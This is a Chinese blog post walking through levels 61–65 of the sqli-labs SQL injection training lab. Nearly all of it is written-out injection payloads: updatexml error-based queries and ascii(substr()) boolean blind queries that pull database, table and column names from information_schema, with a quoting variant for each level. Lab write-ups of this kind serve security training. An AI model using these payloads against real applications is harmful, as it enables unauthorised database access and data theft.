首页 > 数据库 >sqli-labs靶场通关攻略(61-65)

sqli-labs靶场通关攻略(61-65)

时间:2024-09-02 10:22:30浏览次数:15  
标签:字符 sqli labs 61 --+ table ascii id schema

Less-61

步骤一:查看数据库

?id=1')) and updatexml(1,concat(1,(select database())),1)--+

步骤二:查看表名

?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤三:查看users表中列名

?id=1')) and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

Less-62

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1') and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1') and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

Less-63

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1' and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1' and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

Less-64

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1)) and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1)) and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

Less-65

步骤一:查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1") and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1") and ascii(substr(database(),1,1))>99--+

...................................................最终得出challengs

步骤二:查security数据库中第一张表的第一位字符

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤三:查看users表中第一个字段的第一位字符

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

标签:字符,sqli,labs,61,--+,table,ascii,id,schema
From: https://blog.csdn.net/shw_yzh/article/details/141813208

相关文章

  • 20240901_161659 编程剪辑项目列表
    资料20240901_161503编程剪辑相关列表_鲸鱼编程pyhui的技术博客_51CTO博客https://blog.51cto.com/u_13137233/11889402项目20240901_151114python项目获取需要的视频_鲸鱼编程pyhui的技术博客_51CTO博客https://blog.51cto.com/u_13137233/11889375......
  • sqli-labs靶场(51-55)
    51关这关跟50关一样采用报错来查看Less-51/?sort=1andupdatexml(1,concat(1,(selectdatabase())),1)--+查表/Less-51/?sort=1'andupdatexml(1,concat(1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='security')),1)--+查列......
  • (161)时序收敛--->(11)时序收敛十一
    1目录(a)FPGA简介(b)Verilog简介(c)时钟简介(d)时序收敛十一(e)结束1FPGA简介(a)FPGA(FieldProgrammableGateArray)是在PAL(可编程阵列逻辑)、GAL(通用阵列逻辑)等可编程器件的基础上进一步发展的产物。它是作为专用集成电路(ASIC)领域中的一种半定制电路而出现的,既解决了定制电路的不......
  • Ethercat设备数据 转IEC61850项目案例
    目录1 案例说明 12 VFBOX网关工作原理 13 准备工作 25 设置网关采集ETHERCAT数据 56 用IEC61850协议转发数据 77 网关使用多个逻辑设备和逻辑节点的方法 98 安装NPCAP 109 案例总结 111 案例说明设置网关采集EtherCAT设备数据把采集的数据转成IEC61850协议转发给其他系......
  • Ethercat设备数据 转IEC61850项目案例
    目录1 案例说明 12 VFBOX网关工作原理 13 准备工作 25 设置网关采集ETHERCAT数据 56 用IEC61850协议转发数据 77 网关使用多个逻辑设备和逻辑节点的方法 98 安装NPCAP 109 案例总结 111 案例说明设置网关采集EtherCAT设备数据把采集的数据转成IEC61850协议转发给其他......
  • 【卫星姿态控制】线性二次调节器LQR卫星姿态控制【含Matlab源码 4961期】
    ✅博主简介:热爱科研的Matlab仿真开发者,修心和技术同步精进,Matlab项目合作可私信或扫描文章底部QQ二维码。......
  • opc da 服务器数据 转IEC61850项目案例
    目录1 案例说明 12 VFBOX网关工作原理 13 应用条件 24 查看OPCDA服务器的相关参数 25 配置网关采集opcda数据 46 用IEC61850协议转发数据 67 网关使用多个逻辑设备和逻辑节点的方法 98 在服务器上运行仰科OPCDA采集软件 109 案例总结 121 案例说明在OPCDA服务器上......
  • sqli-labs通关(41- )
    第四十一关1、判断闭合和列数整数闭合,共有3列2、查看数据库名?id=-1unionselect1,database() --+3、查看数据表名?id=-1unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema='security'--+4、查看users字段名......
  • P6192 【模板】最小斯坦纳树 题解
    Description给定一个包含\(n\)个结点和\(m\)条带权边的无向连通图\(G=(V,E)\)。再给定包含\(k\)个结点的点集\(S\),选出\(G\)的子图\(G'=(V',E')\),使得:\(S\subseteqV'\);\(G'\)为连通图;\(E'\)中所有边的权值和最小。你只需要求出\(E'\)中所有边的权值......
  • BZOJ2961 共点圆
    小学数学题题意进行转化:询问点\((X,Y)\),是否满足\(\forall_{i\inS}(X-x_i)^2+(Y-y_i)^2\lex_i^2+y_i^2\)。简单化简一下得到:\(X^2+Y^2\le2Xx_i+2Yy_i\)。也就是要维护\(2Xx_i+2Yy_i\)的最小值。\(2Xx_i+2Yy_i<2Xx_j+2Yy_j\)\(=X(x_i-x_j)<Y(y......